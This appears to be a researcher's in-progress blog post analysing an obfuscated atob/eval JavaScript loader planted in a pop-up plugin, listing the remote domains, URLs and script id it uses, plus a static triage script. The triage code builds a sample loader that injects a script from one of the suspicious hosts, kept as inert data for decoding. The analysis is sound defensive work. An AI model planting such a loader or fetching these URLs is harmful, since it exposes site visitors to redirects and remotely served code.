Tracking a Suspicious JavaScript Loader Chain (Work in Progress)

I was recently told that a website was behaving strangely: it was reportedly redirecting users, but only once. After that initial redirect, the behavior would stop or change, which immediately raised some questions about what was happening behind the scenes.

I found the obfuscated JavaScript snippet in a custom JS section of a pop-up plugin; it used atob/eval techniques. I tried to make it readable with the help of CyberChef, and since I am not used to working with obfuscated code, the recipes may not be the cleanest.

Data available on request.

It turned out to be dynamically creating a new script element and loading an external JavaScript file from a remote domain. This means the actual behavior of the site isn’t fully contained in the page itself — it depends on code being fetched and executed from an external source.

The three code snippets create a script element with the same id “rotars”. Two of the snippets try to load the script from the same domain “near.flyspecialline.com” with the name “eGRHSERSW”, and the other snippet loads from “call.colorschemeas.com” with the name “nsYzjY18”. Both currently return 404; I suspect a burn-after-serve logic, but that remains to be investigated when I have more time.

More updates will follow as I trace the connected domains and try to understand how widely this script is being used.

Domains:
- flyspecialline.com
- near.flyspecialline.com
- colorschemeas.com
- call.colorschemeas.com

URL:
- https://near.flyspecialline.com/eGRHSERSW
- https://call.colorschemeas.com/nsYzjY18

Script ID:
- rotars

Techniques:
- obfuscated JavaScript
- atob decoding
- dynamic script injection
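To show how the loader chain above can be triaged without ever executing it, here is an added example (my own code, not part of the original post) that statically peels the base64 layers of an atob()/eval() snippet and reports what the innermost code would do: whether it creates a script element, which id it sets, and which external hosts it would fetch from. The sample snippet is constructed here from the indicators listed on this page; the allow-list hostname “www.example-site.invalid” is an assumption standing in for the site's own origin.

```javascript
// Added example: offline triage of an atob()/eval() script loader.
// Nothing is eval'd; the base64 layers are decoded as data and inspected.

// Constructed sample modelled on the page's indicators. The outer snippet is
// assembled here so the base64 does not have to be hand-typed.
const INNER_PAYLOAD =
  "var s=document.createElement('script');" +
  "s.id='rotars';" +
  "s.src='https://near.flyspecialline.com/eGRHSERSW';" +
  "document.head.appendChild(s);";
const b64 = (s) => Buffer.from(s, 'latin1').toString('base64');
const MIDDLE_LAYER = 'eval(atob("' + b64(INNER_PAYLOAD) + '"));';
const SAMPLE_SNIPPET = 'eval(atob("' + b64(MIDDLE_LAYER) + '"));';

// Matches atob('<base64>') / atob("<base64>") calls with a literal argument.
const ATOB_CALL = /atob\(\s*(['"])([A-Za-z0-9+\/=]+)\1\s*\)/g;

// Peel nested atob() layers; returns the decoded string of each layer.
// atob() yields a binary (latin1) string in the browser, so decode the same way.
function decodeAtobLayers(source, maxDepth = 8) {
  const layers = [];
  let current = source;
  for (let depth = 0; depth < maxDepth; depth++) {
    const matches = [...current.matchAll(ATOB_CALL)];
    if (matches.length === 0) break;
    // Several literals at one depth are joined into a single layer.
    const decoded = matches
      .map((m) => Buffer.from(m[2], 'base64').toString('latin1'))
      .join('\n');
    layers.push(decoded);
    current = decoded;
  }
  return layers;
}

// Pull loader indicators out of one (decoded) code layer.
function extractLoaderIndicators(code) {
  const createsScript = /createElement\(\s*['"]script['"]\s*\)/i.test(code);
  const ids = new Set();
  for (const m of code.matchAll(/\.id\s*=\s*(['"])([^'"]+)\1/g)) ids.add(m[2]);
  for (const m of code.matchAll(/setAttribute\(\s*['"]id['"]\s*,\s*(['"])([^'"]+)\1\s*\)/g)) ids.add(m[2]);
  const urls = new Set();
  const hosts = new Set();
  for (const m of code.matchAll(/https?:\/\/[^\s'"`)]+/g)) {
    urls.add(m[0]);
    try { hosts.add(new URL(m[0]).hostname); } catch (e) { /* malformed URL: skip */ }
  }
  return { createsScript, ids: [...ids].sort(), urls: [...urls].sort(), hosts: [...hosts].sort() };
}

// allowedHosts: origins the site legitimately loads scripts from (assumed value).
function triageLoader(snippet, allowedHosts = new Set(['www.example-site.invalid'])) {
  const layers = decodeAtobLayers(snippet);
  const merged = { createsScript: false, ids: new Set(), urls: new Set(), hosts: new Set() };
  for (const code of [snippet, ...layers]) {
    const ind = extractLoaderIndicators(code);
    merged.createsScript = merged.createsScript || ind.createsScript;
    ind.ids.forEach((v) => merged.ids.add(v));
    ind.urls.forEach((v) => merged.urls.add(v));
    ind.hosts.forEach((v) => merged.hosts.add(v));
  }
  const externalHosts = [...merged.hosts].filter((h) => !allowedHosts.has(h)).sort();
  return {
    layers: layers.length,
    createsScript: merged.createsScript,
    scriptIds: [...merged.ids].sort(),
    urls: [...merged.urls].sort(),
    externalHosts,
    // A dynamically created script pointing at a non-allow-listed host is the
    // pattern described in this post and is what we flag.
    suspicious: merged.createsScript && externalHosts.length > 0,
  };
}

console.log(JSON.stringify(triageLoader(SAMPLE_SNIPPET), null, 2));
```

The decoded hosts and URLs are the values worth feeding into DNS/proxy logs to see which other pages pull the same loader; the script id gives a cheap DOM check (`document.getElementById('rotars')`) for pages you suspect are affected.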

Update 1

I was able to get the remote JS script.

Disclaimer: The following script was extracted during analysis of a suspicious JavaScript redirect and fingerprinting chain. It is shared for educational and security research purposes only.